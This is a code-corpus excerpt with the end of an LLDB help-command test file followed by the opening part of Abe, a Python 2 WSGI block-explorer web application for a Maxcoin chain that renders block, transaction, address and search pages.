"Try 'type lookup thisisnotadebuggercommand' for information on types, methods, functions, modules, etc."])
@no_debug_info_test
def test_custom_help_alias(self):
"""Test that aliases pick up custom help text."""
def cleanup():
self.runCmd('command unalias afriendlyalias', check=False)
self.runCmd('command unalias averyfriendlyalias', check=False)
self.addTearDownHook(cleanup)
self.runCmd(
'command alias --help "I am a friendly alias" -- afriendlyalias help')
self.expect(
"help afriendlyalias",
matching=True,
substrs=['I am a friendly alias'])
self.runCmd(
'command alias --long-help "I am a very friendly alias" -- averyfriendlyalias help')
self.expect("help averyfriendlyalias", matching=True,
substrs=['I am a very friendly alias'])
@no_debug_info_test
def test_help_format_output(self):
"""Test that help output reaches TerminalWidth."""
self.runCmd(
'settings set term-width 108')
self.expect(
"help format",
matching=True,
substrs=['<format> -- One of the format names'])
| youtube/cobalt | third_party/llvm-project/lldb/packages/Python/lldbsuite/test/help/TestHelp.py | Python | bsd-3-clause | 9,505 |
#!/usr/bin/env python
# Copyright(C) 2011,2012,2013,2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
import sys
import os
import optparse
import re
from cgi import escape
import posixpath
import wsgiref.util
import time
import calendar
import math
import logging
import json
import version
import DataStore
import readconf
# bitcointools -- modified deserialize.py to return raw transaction
import deserialize
import util # Added functions.
import base58
__version__ = version.__version__
ABE_APPNAME = "Abe"
ABE_VERSION = __version__
ABE_URL = 'https://github.com/bitcoin-abe/bitcoin-abe'
COPYRIGHT_YEARS = '2011'
COPYRIGHT = "Abe developers"
COPYRIGHT_URL = 'https://github.com/bitcoin-abe'
TIME1970 = time.strptime('1970-01-01','%Y-%m-%d')
EPOCH1970 = calendar.timegm(TIME1970)
# Abe-generated content should all be valid HTML and XHTML fragments.
# Configurable templates may contain either. HTML seems better supported
# under Internet Explorer.
DEFAULT_CONTENT_TYPE = "text/html; charset=utf-8"
DEFAULT_HOMEPAGE = "chain/Maxcoin"
DONATIONS_BTC = ""
DONATIONS_NMC = ""
DEFAULT_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="stylesheet" type="text/css"
href="%(dotdot)s%(STATIC_PATH)sabe.css" />
<link rel="shortcut icon" href="%(dotdot)s%(STATIC_PATH)sfavicon.ico" />
<title>%(title)s</title>
</head>
<body style="text-align: center;">
<h1><a href="%(dotdot)s%(HOMEPAGE)s"><img
src="%(dotdot)s%(STATIC_PATH)smaxexplorer.png" alt="Max Explorer" /></a></h1>
%(body)s
<p><a href="%(dotdot)sq">API</a> (machine-readable pages)</p>
<p style="font-size: smaller">
<span style="font-style: italic">
Powered by <a href="%(ABE_URL)s">%(APPNAME)s</a>
</span>
%(download)s
</p>
</body>
</html>
"""
DEFAULT_LOG_FORMAT = "%(message)s"
DEFAULT_DECIMALS = 8
# It is fun to change "6" to "3" and search lots of addresses.
ADDR_PREFIX_RE = re.compile('[1-9A-HJ-NP-Za-km-z]{6,}\\Z')
HEIGHT_RE = re.compile('(?:0|[1-9][0-9]*)\\Z')
HASH_PREFIX_RE = re.compile('[0-9a-fA-F]{0,64}\\Z')
HASH_PREFIX_MIN = 6
NETHASH_HEADER = """\
blockNumber: height of last block in interval + 1
time: block time in seconds since 0h00 1 Jan 1970 UTC
target: decimal target at blockNumber
avgTargetSinceLast: harmonic mean of target over interval
difficulty: difficulty at blockNumber
hashesToWin: expected number of hashes needed to solve a block at this difficulty
avgIntervalSinceLast: interval seconds divided by blocks
netHashPerSecond: estimated network hash rate over interval
Statistical values are approximate and differ slightly from http://blockexplorer.com/q/nethash.
/chain/CHAIN/q/nethash[/INTERVAL[/START[/STOP]]]
Default INTERVAL=144, START=0, STOP=infinity.
Negative values back from the last block.
Append ?format=json to URL for headerless, JSON output.
blockNumber,time,target,avgTargetSinceLast,difficulty,hashesToWin,avgIntervalSinceLast,netHashPerSecond
START DATA
"""
NETHASH_SVG_TEMPLATE = """\
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:abe="http://abe.bit/abe"
viewBox="0 0 300 200"
preserveAspectRatio="none"
onload="Abe.draw(this)">
<style>
#chart polyline {
stroke-width: 0.1%%;
fill-opacity: 0;
stroke-opacity: 0.5;
</style>
<script type="application/ecmascript"
xlink:href="%(dotdot)s%(STATIC_PATH)snethash.js"/>
<g id="chart">
<polyline abe:window="1d" style="stroke: red;"/>
<polyline abe:window="3d" style="stroke: orange;"/>
<polyline abe:window="7d" style="stroke: yellow;"/>
<polyline abe:window="14d" style="stroke: green;"/>
<polyline abe:window="30d" style="stroke: blue;"/>
%(body)s
</g>
</svg>
"""
# How many addresses to accept in /unspent/ADDR|ADDR|...
MAX_UNSPENT_ADDRESSES = 200
def make_store(args):
store = DataStore.new(args)
if (not args.no_load):
store.catch_up()
return store
class NoSuchChainError(Exception):
"""Thrown when a chain lookup fails"""
class PageNotFound(Exception):
"""Thrown when code wants to return 404 Not Found"""
class Redirect(Exception):
"""Thrown when code wants to redirect the request"""
class Streamed(Exception):
"""Thrown when code has written the document to the callable
returned by start_response."""
class Abe:
def __init__(abe, store, args):
abe.store = store
abe.args = args
abe.htdocs = args.document_root or find_htdocs()
abe.static_path = '' if args.static_path is None else args.static_path
abe.template_vars = args.template_vars.copy()
abe.template_vars['STATIC_PATH'] = (
abe.template_vars.get('STATIC_PATH', abe.static_path))
abe.template = flatten(args.template)
abe.debug = args.debug
abe.log = logging.getLogger(__name__)
abe.log.info('Abe initialized.')
abe.home = str(abe.template_vars.get("HOMEPAGE", DEFAULT_HOMEPAGE))
if not args.auto_agpl:
abe.template_vars['download'] = (
abe.template_vars.get('download', ''))
abe.base_url = args.base_url
abe.address_history_rows_max = int(
args.address_history_rows_max or 1000)
if args.shortlink_type is None:
abe.shortlink_type = ("firstbits" if store.use_firstbits else
"non-firstbits")
else:
abe.shortlink_type = args.shortlink_type
if abe.shortlink_type != "firstbits":
abe.shortlink_type = int(abe.shortlink_type)
if abe.shortlink_type < 2:
raise ValueError("shortlink-type: 2 character minimum")
elif not store.use_firstbits:
abe.shortlink_type = "non-firstbits"
abe.log.warning("Ignoring shortlink-type=firstbits since" +
" the database does not support it.")
if abe.shortlink_type == "non-firstbits":
abe.shortlink_type = 10
def __call__(abe, env, start_response):
import urlparse
page = {
"status": '200 OK',
"title": [escape(ABE_APPNAME), " ", ABE_VERSION],
"body": [],
"env": env,
"params": {},
"dotdot": "../" * (env['PATH_INFO'].count('/') - 1),
"start_response": start_response,
"content_type": str(abe.template_vars['CONTENT_TYPE']),
"template": abe.template,
"chain": None,
}
if 'QUERY_STRING' in env:
page['params'] = urlparse.parse_qs(env['QUERY_STRING'])
if abe.fix_path_info(env):
abe.log.debug("fixed path_info")
return redirect(page)
cmd = wsgiref.util.shift_path_info(env)
handler = abe.get_handler(cmd)
tvars = abe.template_vars.copy()
tvars['dotdot'] = page['dotdot']
page['template_vars'] = tvars
try:
if handler is None:
return abe.serve_static(cmd + env['PATH_INFO'], start_response)
if (not abe.args.no_load):
# Always be up-to-date, even if we means having to wait
# for a response! XXX Could use threads, timers, or a
# cron job.
abe.store.catch_up()
handler(page)
except PageNotFound:
page['status'] = '404 Not Found'
page['body'] = ['<p class="error">Sorry, ', env['SCRIPT_NAME'],
env['PATH_INFO'],
' does not exist on this server.</p>']
except NoSuchChainError, e:
page['body'] += [
'<p class="error">'
'Sorry, I don\'t know about that chain!</p>\n']
except Redirect:
return redirect(page)
except Streamed:
return ''
except Exception:
abe.store.rollback()
raise
abe.store.rollback() # Close implicitly opened transaction.
start_response(page['status'],
[('Content-type', page['content_type']),
('Cache-Control', 'max-age=30')])
tvars['title'] = flatten(page['title'])
tvars['h1'] = flatten(page.get('h1') or page['title'])
tvars['body'] = flatten(page['body'])
if abe.args.auto_agpl:
tvars['download'] = (
' <a href="' + page['dotdot'] + 'download">Source</a>')
content = page['template'] % tvars
if isinstance(content, unicode):
content = content.encode('UTF-8')
return content
def get_handler(abe, cmd):
return getattr(abe, 'handle_' + cmd, None)
def handle_chains(abe, page):
page['title'] = 'Max Explorer'
body = page['body']
body += [
abe.search_form(page),
'<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Currency</th><th>Code</th><th>Block</th><th>Time</th>',
'<th>Started</th><th>Age (days)</th><th>Coins Created</th>',
'<th>Avg Coin Age</th><th>',
'% <a href="https://en.bitcoin.it/wiki/Bitcoin_Days_Destroyed">',
'CoinDD</a></th>',
'</tr>\n']
now = time.time() - EPOCH1970
rows = abe.store.selectall("""
SELECT c.chain_name, b.block_height, b.block_nTime, b.block_hash,
b.block_total_seconds, b.block_total_satoshis,
b.block_satoshi_seconds,
b.block_total_ss
FROM chain c
JOIN block b ON (c.chain_last_block_id = b.block_id)
ORDER BY c.chain_name
""")
for row in rows:
name = row[0]
chain = abe.store.get_chain_by_name(name)
if chain is None:
abe.log.warning("Store does not know chain: %s", name)
continue
body += [
'<tr><td><a href="chain/', escape(name), '">',
escape(name), '</a></td><td>', escape(chain.code3), '</td>']
if row[1] is not None:
(height, nTime, hash) = (
int(row[1]), int(row[2]), abe.store.hashout_hex(row[3]))
body += [
'<td><a href="block/', hash, '">', height, '</a></td>',
'<td>', format_time(nTime), '</td>']
if row[6] is not None and row[7] is not None:
(seconds, satoshis, ss, total_ss) = (
int(row[4]), int(row[5]), int(row[6]), int(row[7]))
started = nTime - seconds
chain_age = now - started
since_block = now - nTime
if satoshis == 0:
avg_age = ' '
else:
avg_age = '%5g' % ((float(ss) / satoshis + since_block)
/ 86400.0)
if chain_age <= 0:
percent_destroyed = ' '
else:
more = since_block * satoshis
denominator = total_ss + more
if denominator <= 0:
percent_destroyed = ' '
else:
percent_destroyed = '%5g%%' % (
100.0 - (100.0 * (ss + more) / denominator))
body += [
'<td>', format_time(started)[:10], '</td>',
'<td>', '%5g' % (chain_age / 86400.0), '</td>',
'<td>', format_satoshis(satoshis, chain), '</td>',
'<td>', avg_age, '</td>',
'<td>', percent_destroyed, '</td>']
body += ['</tr>\n']
body += ['</table>\n']
if len(rows) == 0:
body += ['<p>No block data found.</p>\n']
def chain_lookup_by_name(abe, symbol):
if symbol is None:
ret = abe.get_default_chain()
else:
ret = abe.store.get_chain_by_name(symbol)
if ret is None:
raise NoSuchChainError()
return ret
def get_default_chain(abe):
return abe.store.get_default_chain()
def format_addresses(abe, data, dotdot, chain):
if data['binaddr'] is None:
return 'Unknown'
if 'subbinaddr' in data:
# Multisig or known P2SH.
ret = [hash_to_address_link(chain.script_addr_vers, data['binaddr'], dotdot, text='Escrow'),
' ', data['required_signatures'], ' of']
for binaddr in data['subbinaddr']:
ret += [' ', hash_to_address_link(data['address_version'], binaddr, dotdot, 10)]
return ret
return hash_to_address_link(data['address_version'], data['binaddr'], dotdot)
def call_handler(abe, page, cmd):
handler = abe.get_handler(cmd)
if handler is None:
raise PageNotFound()
handler(page)
def handle_chain(abe, page):
symbol = wsgiref.util.shift_path_info(page['env'])
chain = abe.chain_lookup_by_name(symbol)
page['chain'] = chain
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd == '':
page['env']['SCRIPT_NAME'] = page['env']['SCRIPT_NAME'][:-1]
raise Redirect()
if cmd == 'chain' or cmd == 'chains':
raise PageNotFound()
if cmd is not None:
abe.call_handler(page, cmd)
return
page['title'] = chain.name
body = page['body']
body += abe.search_form(page)
count = get_int_param(page, 'count') or 20
hi = get_int_param(page, 'hi')
orig_hi = hi
if hi is None:
row = abe.store.selectrow("""
SELECT b.block_height
FROM block b
JOIN chain c ON (c.chain_last_block_id = b.block_id)
WHERE c.chain_id = ?
""", (chain.id,))
if row:
hi = row[0]
if hi is None:
if orig_hi is None and count > 0:
body += ['<p>I have no blocks in this chain.</p>']
else:
body += ['<p class="error">'
'The requested range contains no blocks.</p>\n']
return
rows = abe.store.selectall("""
SELECT b.block_hash, b.block_height, b.block_nTime, b.block_num_tx,
b.block_nBits, b.block_value_out,
b.block_total_seconds, b.block_satoshi_seconds,
b.block_total_satoshis, b.block_ss_destroyed,
b.block_total_ss
FROM block b
JOIN chain_candidate cc ON (b.block_id = cc.block_id)
WHERE cc.chain_id = ?
AND cc.block_height BETWEEN ? AND ?
AND cc.in_longest = 1
ORDER BY cc.block_height DESC LIMIT ?
""", (chain.id, hi - count + 1, hi, count))
if hi is None:
hi = int(rows[0][1])
basename = os.path.basename(page['env']['PATH_INFO'])
nav = ['<a href="',
basename, '?count=', str(count), '"><<</a>']
nav += [' <a href="', basename, '?hi=', str(hi + count),
'&count=', str(count), '"><</a>']
nav += [' ', '>']
if hi >= count:
nav[-1] = ['<a href="', basename, '?hi=', str(hi - count),
'&count=', str(count), '">', nav[-1], '</a>']
nav += [' ', '>>']
if hi != count - 1:
nav[-1] = ['<a href="', basename, '?hi=', str(count - 1),
'&count=', str(count), '">', nav[-1], '</a>']
for c in (20, 50, 100, 500, 2016):
nav += [' ']
if c != count:
nav += ['<a href="', basename, '?count=', str(c)]
if hi is not None:
nav += ['&hi=', str(max(hi, c - 1))]
nav += ['">']
nav += [' ', str(c)]
if c != count:
nav += ['</a>']
nav += [' <a href="', page['dotdot'], '">Search</a>']
extra = False
#extra = True
body += ['<p>', nav, '</p>\n',
'<table style="margin-right: auto; margin-left: auto;"><tr><th>Block</th><th>Approx. Time</th>',
'<th>Transactions</th><th>Value Out</th>',
'<th>Difficulty</th><th>Outstanding</th>',
'<th>Average Age</th><th>Chain Age</th>',
'<th>% ',
'<a href="https://en.bitcoin.it/wiki/Bitcoin_Days_Destroyed">',
'CoinDD</a></th>',
['<th>Satoshi-seconds</th>',
'<th>Total ss</th>']
if extra else '',
'</tr>\n']
for row in rows:
(hash, height, nTime, num_tx, nBits, value_out,
seconds, ss, satoshis, destroyed, total_ss) = row
nTime = int(nTime)
value_out = int(value_out)
seconds = int(seconds)
satoshis = int(satoshis)
ss = int(ss)
total_ss = int(total_ss)
if satoshis == 0:
avg_age = ' '
else:
avg_age = '%5g' % (ss / satoshis / 86400.0)
if total_ss <= 0:
percent_destroyed = ' '
else:
percent_destroyed = '%5g%%' % (100.0 - (100.0 * ss / total_ss))
body += [
'<tr><td><a href="', page['dotdot'], 'block/',
abe.store.hashout_hex(hash),
'">', height, '</a>'
'</td><td>', format_time(int(nTime)),
'</td><td>', num_tx,
'</td><td>', format_satoshis(value_out, chain),
'</td><td>', util.calculate_difficulty(int(nBits)),
'</td><td>', format_satoshis(satoshis, chain),
'</td><td>', avg_age,
'</td><td>', '%5g' % (seconds / 86400.0),
'</td><td>', percent_destroyed,
['</td><td>', '%8g' % ss,
'</td><td>', '%8g' % total_ss] if extra else '',
'</td></tr>\n']
body += ['</table>\n<p>', nav, '</p>\n']
def _show_block(abe, page, dotdotblock, chain, **kwargs):
body = page['body']
try:
b = abe.store.export_block(chain, **kwargs)
except DataStore.MalformedHash:
body += ['<p class="error">Not in correct format.</p>']
return
if b is None:
body += ['<p class="error">Block not found.</p>']
return
in_longest = False
for cc in b['chain_candidates']:
if chain is None:
chain = cc['chain']
if chain.id == cc['chain'].id:
in_longest = cc['in_longest']
if in_longest:
page['title'] = [escape(chain.name), ' ', b['height']]
page['h1'] = ['<a href="', page['dotdot'], 'chain/',
escape(chain.name), '?hi=', b['height'], '">',
escape(chain.name), '</a> ', b['height']]
else:
page['title'] = ['Block ', b['hash'][:4], '...', b['hash'][-10:]]
body += abe.short_link(page, 'b/' + block_shortlink(b['hash']))
is_stake_chain = chain.has_feature('nvc_proof_of_stake')
is_stake_block = is_stake_chain and b['is_proof_of_stake']
body += ['<p>']
if is_stake_chain:
body += [
'Proof of Stake' if is_stake_block else 'Proof of Work',
': ',
format_satoshis(b['generated'], chain), ' coins generated<br />\n']
body += ['Hash: ', b['hash'], '<br />\n']
if b['hashPrev'] is not None:
body += ['Previous Block: <a href="', dotdotblock,
b['hashPrev'], '">', b['hashPrev'], '</a><br />\n']
if b['next_block_hashes']:
body += ['Next Block: ']
for hash in b['next_block_hashes']:
body += ['<a href="', dotdotblock, hash, '">', hash, '</a><br />\n']
body += [
['Height: ', b['height'], '<br />\n']
if b['height'] is not None else '',
'Version: ', b['version'], '<br />\n',
'Transaction Merkle Root: ', b['hashMerkleRoot'], '<br />\n',
'Time: ', b['nTime'], ' (', format_time(b['nTime']), ')<br />\n',
'Difficulty: ', format_difficulty(util.calculate_difficulty(b['nBits'])),
' (Bits: %x)' % (b['nBits'],), '<br />\n',
['Cumulative Difficulty: ', format_difficulty(
util.work_to_difficulty(b['chain_work'])), '<br />\n']
if b['chain_work'] is not None else '',
'Nonce: ', b['nNonce'], '<br />\n',
'Transactions: ', len(b['transactions']), '<br />\n',
'Value out: ', format_satoshis(b['value_out'], chain), '<br />\n',
'Transaction Fees: ', format_satoshis(b['fees'], chain), '<br />\n',
['Average Coin Age: %6g' % (b['satoshi_seconds'] / 86400.0 / b['chain_satoshis'],),
' days<br />\n']
if b['chain_satoshis'] and (b['satoshi_seconds'] is not None) else '',
'' if b['satoshis_destroyed'] is None else
['Coin-days Destroyed: ',
format_satoshis(b['satoshis_destroyed'] / 86400.0, chain), '<br />\n'],
['Cumulative Coin-days Destroyed: %6g%%<br />\n' %
(100 * (1 - float(b['satoshi_seconds']) / b['chain_satoshi_seconds']),)]
if b['chain_satoshi_seconds'] else '',
['sat=',b['chain_satoshis'],';sec=',seconds,';ss=',b['satoshi_seconds'],
';total_ss=',b['chain_satoshi_seconds'],';destroyed=',b['satoshis_destroyed']]
if abe.debug else '',
'</p>\n']
body += ['<h3>Transactions</h3>\n']
body += ['<table style="margin-right: auto; margin-left: auto;"><tr><th>Transaction</th><th>Fee</th>'
'<th>Size (kB)</th><th>From (amount)</th><th>To (amount)</th>'
'</tr>\n']
for tx in b['transactions']:
body += ['<tr><td><a href="../tx/' + tx['hash'] + '">',
tx['hash'][:10], '...</a>'
'</td><td>', format_satoshis(tx['fees'], chain),
'</td><td>', tx['size'] / 1000.0,
'</td><td>']
if tx is b['transactions'][0]:
body += [
'POS ' if is_stake_block else '',
'Generation: ', format_satoshis(b['generated'], chain), ' + ',
format_satoshis(b['fees'], chain), ' total fees']
else:
for txin in tx['in']:
body += [abe.format_addresses(txin, page['dotdot'], chain), ': ',
format_satoshis(txin['value'], chain), '<br />']
body += ['</td><td>']
for txout in tx['out']:
if is_stake_block:
if tx is b['transactions'][0]:
assert txout['value'] == 0
assert len(tx['out']) == 1
body += [
format_satoshis(b['proof_of_stake_generated'], chain),
' included in the following transaction']
continue
if txout['value'] == 0:
continue
body += [abe.format_addresses(txout, page['dotdot'], chain), ': ',
format_satoshis(txout['value'], chain), '<br />']
body += ['</td></tr>\n']
body += '</table>\n'
def handle_block(abe, page):
block_hash = wsgiref.util.shift_path_info(page['env'])
if block_hash in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
block_hash = block_hash.lower() # Case-insensitive, BBE compatible
page['title'] = 'Block'
if not is_hash_prefix(block_hash):
page['body'] += ['<p class="error">Not a valid block hash.</p>']
return
abe._show_block(page, '', None, block_hash=block_hash)
def handle_tx(abe, page):
tx_hash = wsgiref.util.shift_path_info(page['env'])
if tx_hash in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
tx_hash = tx_hash.lower() # Case-insensitive, BBE compatible
page['title'] = ['Transaction ', tx_hash[:10], '...', tx_hash[-4:]]
body = page['body']
if not is_hash_prefix(tx_hash):
body += ['<p class="error">Not a valid transaction hash.</p>']
return
try:
# XXX Should pass chain to export_tx to help parse scripts.
tx = abe.store.export_tx(tx_hash = tx_hash, format = 'browser')
except DataStore.MalformedHash:
body += ['<p class="error">Not in correct format.</p>']
return
if tx is None:
body += ['<p class="error">Transaction not found.</p>']
return
return abe.show_tx(page, tx)
def show_tx(abe, page, tx):
body = page['body']
def row_to_html(row, this_ch, other_ch, no_link_text):
body = page['body']
body += [
'<tr>\n',
'<td><a name="', this_ch, row['pos'], '">', row['pos'],
'</a></td>\n<td>']
if row['o_hash'] is None:
body += [no_link_text]
else:
body += [
'<a href="', row['o_hash'], '#', other_ch, row['o_pos'],
'">', row['o_hash'][:10], '...:', row['o_pos'], '</a>']
body += [
'</td>\n',
'<td>', format_satoshis(row['value'], chain), '</td>\n',
'<td>', abe.format_addresses(row, '../', chain), '</td>\n']
if row['binscript'] is not None:
body += ['<td>', escape(decode_script(row['binscript'])), '</td>\n']
body += ['</tr>\n']
body += abe.short_link(page, 't/' + hexb58(tx['hash'][:14]))
body += ['<p>Hash: ', tx['hash'], '<br />\n']
chain = None
is_coinbase = None
for tx_cc in tx['chain_candidates']:
if chain is None:
chain = tx_cc['chain']
is_coinbase = (tx_cc['tx_pos'] == 0)
elif tx_cc['chain'].id != chain.id:
abe.log.warning('Transaction ' + tx['hash'] + ' in multiple chains: '
+ tx_cc['chain'].id + ', ' + chain.id)
blk_hash = tx_cc['block_hash']
body += [
'Appeared in <a href="../block/', blk_hash, '">',
escape(tx_cc['chain'].name), ' ',
tx_cc['block_height'] if tx_cc['in_longest'] else [blk_hash[:10], '...', blk_hash[-4:]],
'</a> (', format_time(tx_cc['block_nTime']), ')<br />\n']
if chain is None:
abe.log.warning('Assuming default chain for Transaction ' + tx['hash'])
chain = abe.get_default_chain()
body += [
'Number of inputs: ', len(tx['in']),
' (<a href="#inputs">Jump to inputs</a>)<br />\n',
'Total in: ', format_satoshis(tx['value_in'], chain), '<br />\n',
'Number of outputs: ', len(tx['out']),
' (<a href="#outputs">Jump to outputs</a>)<br />\n',
'Total out: ', format_satoshis(tx['value_out'], chain), '<br />\n',
'Size: ', tx['size'], ' bytes<br />\n',
'Fee: ', format_satoshis(0 if is_coinbase else
(tx['value_in'] and tx['value_out'] and
tx['value_in'] - tx['value_out']), chain),
'<br />\n',
'<a href="../rawtx/', tx['hash'], '">Raw transaction</a><br />\n']
body += ['</p>\n',
'<a name="inputs"><h3>Inputs</h3></a>\n<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Index</th><th>Previous output</th><th>Amount</th>',
'<th>From address</th>']
if abe.store.keep_scriptsig:
body += ['<th>ScriptSig</th>']
body += ['</tr>\n']
for txin in tx['in']:
row_to_html(txin, 'i', 'o',
'Generation' if is_coinbase else 'Unknown')
body += ['</table>\n',
'<a name="outputs"><h3>Outputs</h3></a>\n<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Index</th><th>Redeemed at input</th><th>Amount</th>',
'<th>To address</th><th>ScriptPubKey</th></tr>\n']
for txout in tx['out']:
row_to_html(txout, 'o', 'i', 'Not yet redeemed')
body += ['</table>\n']
def handle_rawtx(abe, page):
abe.do_raw(page, abe.do_rawtx)
def do_rawtx(abe, page, chain):
tx_hash = wsgiref.util.shift_path_info(page['env'])
if tx_hash in (None, '') or page['env']['PATH_INFO'] != '' \
or not is_hash_prefix(tx_hash):
return 'ERROR: Not in correct format' # BBE compatible
tx = abe.store.export_tx(tx_hash=tx_hash.lower())
if tx is None:
return 'ERROR: Transaction does not exist.' # BBE compatible
return json.dumps(tx, sort_keys=True, indent=2)
def handle_address(abe, page):
address = wsgiref.util.shift_path_info(page['env'])
if address in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
body = page['body']
page['title'] = 'Address ' + escape(address)
try:
history = abe.store.export_address_history(
address, chain=page['chain'], max_rows=abe.address_history_rows_max)
except DataStore.MalformedAddress:
page['status'] = '404 Not Found'
body += ['<p>Not a valid address.</p>']
return
if history is None:
body += ["<p>I'm sorry, this address has too many records"
" to display.</p>"]
return
binaddr = history['binaddr']
version = history['version']
chains = history['chains']
txpoints = history['txpoints']
balance = history['balance']
sent = history['sent']
received = history['received']
counts = history['counts']
if (not chains):
page['status'] = '404 Not Found'
body += ['<p>Address not seen on the network.</p>']
return
def format_amounts(amounts, link):
ret = []
for chain in chains:
if ret:
ret += [', ']
ret += [format_satoshis(amounts[chain.id], chain),
' ', escape(chain.code3)]
if link:
vers = chain.address_version
if page['chain'] is not None and version == page['chain'].script_addr_vers:
vers = chain.script_addr_vers or vers
other = util.hash_to_address(vers, binaddr)
if other != address:
ret[-1] = ['<a href="', page['dotdot'],
'address/', other,
'">', ret[-1], '</a>']
return ret
if abe.shortlink_type == "firstbits":
link = abe.store.get_firstbits(
address_version=version, db_pubkey_hash=abe.store.binin(binaddr),
chain_id = (page['chain'] and page['chain'].id))
if link:
link = link.replace('l', 'L')
else:
link = address
else:
link = address[0 : abe.shortlink_type]
body += abe.short_link(page, 'a/' + link)
body += ['<p>Balance: '] + format_amounts(balance, True)
if 'subbinaddr' in history:
chain = page['chain']
if chain is None:
for c in chains:
if c.script_addr_vers == version:
chain = c
break
if chain is None:
chain = chains[0]
body += ['<br />\nEscrow']
for subbinaddr in history['subbinaddr']:
body += [' ', hash_to_address_link(chain.address_version, subbinaddr, page['dotdot'], 10) ]
for chain in chains:
balance[chain.id] = 0 # Reset for history traversal.
body += ['<br />\n',
'Transactions in: ', counts[0], '<br />\n',
'Received: ', format_amounts(received, False), '<br />\n',
'Transactions out: ', counts[1], '<br />\n',
'Sent: ', format_amounts(sent, False), '<br />\n']
body += ['</p>\n'
'<h3>Transactions</h3>\n'
'<table style="margin-right: auto; margin-left: auto;" class="addrhist">\n<tr><th>Transaction</th><th>Block</th>'
'<th>Approx. Time</th><th>Amount</th><th>Balance</th>'
'<th>Currency</th></tr>\n']
for elt in txpoints:
chain = elt['chain']
type = elt['type']
if type == 'direct':
balance[chain.id] += elt['value']
body += ['<tr class="', type, '"><td class="tx"><a href="../tx/', elt['tx_hash'],
'#', 'i' if elt['is_out'] else 'o', elt['pos'],
'">', elt['tx_hash'][:10], '...</a>',
'</td><td class="block"><a href="../block/', elt['blk_hash'],
'">', elt['height'], '</a></td><td class="time">',
format_time(elt['nTime']), '</td><td class="amount">']
if elt['value'] < 0:
value = '(' + format_satoshis(-elt['value'], chain) + ')'
else:
value = format_satoshis(elt['value'], chain)
if 'binaddr' in elt:
value = hash_to_address_link(chain.script_addr_vers, elt['binaddr'], page['dotdot'], text=value)
body += [value, '</td><td class="balance">',
format_satoshis(balance[chain.id], chain),
'</td><td class="currency">', escape(chain.code3),
'</td></tr>\n']
body += ['</table>\n']
def search_form(abe, page):
q = (page['params'].get('q') or [''])[0]
return [
'<p>Search by address, block number or hash, transaction or'
' public key hash, or chain name:</p>\n'
'<form action="', page['dotdot'], 'search"><p>\n'
'<input name="q" size="64" value="', escape(q), '" />'
'<button type="submit">Search</button>\n'
'<br />Address or hash search requires at least the first ',
HASH_PREFIX_MIN, ' characters.</p></form>\n']
def handle_search(abe, page):
page['title'] = 'Search'
q = (page['params'].get('q') or [''])[0]
if q == '':
page['body'] = [
'<p>Please enter search terms.</p>\n', abe.search_form(page)]
return
found = []
if HEIGHT_RE.match(q): found += abe.search_number(int(q))
if util.possible_address(q):found += abe.search_address(q)
elif ADDR_PREFIX_RE.match(q):found += abe.search_address_prefix(q)
if is_hash_prefix(q): found += abe.search_hash_prefix(q)
abe.show_search_results(page, found)
def show_search_results(abe, page, found):
if not found:
page['body'] = [
'<p>No results found.</p>\n', abe.search_form(page)]
return
if len(found) == 1:
# Undo shift_path_info.
sn = posixpath.dirname(page['env']['SCRIPT_NAME'])
if sn == '/': sn = ''
page['env']['SCRIPT_NAME'] = sn
page['env']['PATH_INFO'] = '/' + page['dotdot'] + found[0]['uri']
del(page['env']['QUERY_STRING'])
raise Redirect()
body = page['body']
body += ['<h3>Search Results</h3>\n<ul>\n']
for result in found:
body += [
'<li><a href="', page['dotdot'], escape(result['uri']), '">',
escape(result['name']), '</a></li>\n']
body += ['</ul>\n']
def search_number(abe, n):
def process(row):
(chain_name, dbhash, in_longest) = row
hexhash = abe.store.hashout_hex(dbhash)
if in_longest == 1:
name = str(n)
else:
name = hexhash
return {
'name': chain_name + ' ' + name,
'uri': 'block/' + hexhash,
}
return map(process, abe.store.selectall("""
SELECT c.chain_name, b.block_hash, cc.in_longest
FROM chain c
JOIN chain_candidate cc ON (cc.chain_id = c.chain_id)
JOIN block b ON (b.block_id = cc.block_id)
WHERE cc.block_height = ?
ORDER BY c.chain_name, cc.in_longest DESC
""", (n,)))
def search_hash_prefix(abe, q, types = ('tx', 'block', 'pubkey')):
q = q.lower()
ret = []
for t in types:
def process(row):
if t == 'tx': name = 'Transaction'
elif t == 'block': name = 'Block'
else:
# XXX Use Bitcoin address version until we implement
# /pubkey/... for this to link to.
return abe._found_address(
util.hash_to_address('\0', abe.store.binout(row[0])))
hash = abe.store.hashout_hex(row[0])
return {
'name': name + ' ' + hash,
'uri': t + '/' + hash,
}
if t == 'pubkey':
if len(q) > 40:
continue
lo = abe.store.binin_hex(q + '0' * (40 - len(q)))
hi = abe.store.binin_hex(q + 'f' * (40 - len(q)))
else:
lo = abe.store.hashin_hex(q + '0' * (64 - len(q)))
hi = abe.store.hashin_hex(q + 'f' * (64 - len(q)))
ret += map(process, abe.store.selectall(
"SELECT " + t + "_hash FROM " + t + " WHERE " + t +
# XXX hardcoded limit.
"_hash BETWEEN ? AND ? LIMIT 100",
(lo, hi)))
return ret
def _found_address(abe, address):
return { 'name': 'Address ' + address, 'uri': 'address/' + address }
def search_address(abe, address):
try:
binaddr = base58.bc_address_to_hash_160(address)
except Exception:
return abe.search_address_prefix(address)
return [abe._found_address(address)]
def search_address_prefix(abe, ap):
ret = []
ones = 0
